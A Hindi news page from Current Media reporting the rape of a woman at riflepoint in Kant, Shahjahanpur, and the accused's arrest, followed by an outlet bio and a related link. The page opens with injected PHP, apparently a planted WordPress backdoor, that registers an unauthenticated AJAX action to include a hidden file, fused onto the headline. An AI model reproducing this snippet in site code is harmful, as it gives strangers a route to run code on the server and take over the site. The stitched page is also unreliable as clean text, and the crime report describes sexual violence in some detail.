if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }यूपी के शाहजहांपुर मे घर में घुसकर महिला से दुष्कर्म, पति जागा तो रायफल छोड़ भागा आरोपी, गिरफ्तार - Current Media

यूपी के शाहजहांपुर मे घर में घुसकर महिला से दुष्कर्म, पति जागा तो रायफल छोड़ भागा आरोपी, गिरफ्तार

शाहजहांपुर। मो0 आफाक। थाना कांट क्षेत्र में घर में घुसकर रायफल दिखाकर एक महिला से दुष्कर्म किया गया। आहट होने पर पति जाग गया, तो आरोपी अपनी रायफल छोड़कर मौके से भाग गया। पुलिस ने पीड़िता के पति की तहरीर पर आरोपी के खिलाफ दुष्कर्म और हरिजन एक्ट आदि धाराओं में मुकदमा दर्ज किया और आरोपी को गिरफ्तार किया है।दरअसल, शाहजहांपुर के थाना कांट क्षेत्र में बीती गुरुवार रात करीब साढ़े दस बजे गांव का ही नीरज अपने पड़ोसी के घर में घुस गया और घर में घुसकर उसने रायफल दिखाकर महिला से जबरन दुष्कर्म किया।आहट सुनकर महिला का पति जाग गया, तो आरोपी मौके से भाग गया और अपनी रायफल आदि मौके पर छोड़ गया। पुलिस ने पीड़िता के पति की तहरीर पर आरोपी के खिलाफ दुष्कर्म और हरिजन एक्ट समेत गंभीर धाराओं में मुकदमा दर्ज किया और उसकी तलाश शुरू की। रविवार दोपहर पुलिस ने मुखबिर की सूचना पर जिंदो वाली पुलिया के पास से आरोपी नीरज को गिरफ्तार किया और विधिक कार्रवाई करते हुए उसे जेल भेज दिया।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

शांतिपूर्ण माहौल में अदा हुई ईद-उल-अज़हा की नमाज

शाहजहांपुर। मो0आफाक । शाहजहांपुर में ईद-उल-अजहा का त्योहार गुरुवार को शांतिपूर्ण और सौहार्दपूर्ण माहौल में …